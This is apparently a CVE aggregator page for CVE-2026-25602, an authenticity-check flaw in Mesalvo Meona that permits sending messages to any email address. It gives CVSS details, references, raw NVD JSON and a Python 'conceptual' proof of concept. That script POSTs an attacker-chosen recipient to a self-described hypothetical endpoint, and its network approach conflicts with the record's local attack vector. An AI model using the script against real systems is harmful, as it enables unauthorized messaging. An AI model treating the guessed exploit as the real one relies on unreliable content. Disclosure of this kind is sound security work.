CVE-2026-25602

Description

Insufficient Verification of Data Authenticity vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component makes it possible to send messages to any email address. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020.

CVSS Details

CVSS Score

4.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Mesalvo Meona Client Launcher Component <= 19.06.2020 15:11:49

Mesalvo Meona Server Component <= 2025.04 5+323020

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests # Conceptual Proof of Concept for CVE-2026-25602 # Target: Mesalvo Meona Client/Server Component # Description: Exploit insufficient verification to send email to arbitrary address def exploit(target_ip, target_email): # Hypothetical endpoint vulnerable to the lack of data verification url = f"http://{target_ip}:8080/api/v1/send_notification" # Constructing the malicious payload # The vulnerability allows bypassing checks on the 'recipient' field payload = { "sender": "[email protected]", "recipient": target_email, # Attacker controlled email "subject": "Unauthorized Message", "body": "This message was sent due to CVE-2026-25602." } headers = { "Content-Type": "application/json", "User-Agent": "Meona-Client/19.06.2020" } try: print(f"[*] Attempting to send message to {target_email}...") response = requests.post(url, json=payload, headers=headers, timeout=5) if response.status_code == 200: print("[+] Exploit successful! Message sent.") print(f"[+] Response: {response.text}") else: print(f"[-] Exploit failed. Status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error during request: {e}") if __name__ == "__main__": # Example usage target = "127.0.0.1" victim_email = "[email protected]" exploit(target, victim_email)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-25602
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-25602
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-25602/
[4] VulDB https://vuldb.com/cve/CVE-2026-25602
[5] https://seccore.at/blog/cves-meona/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-25602", "sourceIdentifier": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "published": "2026-05-20T11:16:26.313", "lastModified": "2026-05-20T14:03:10.193", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insufficient Verification of Data Authenticity vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component makes it possible to send messages to any email address. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020."}], "metrics": {"cvssMetricV31": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-345"}]}], "references": [{"url": "https://seccore.at/blog/cves-meona/", "source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158"}]}}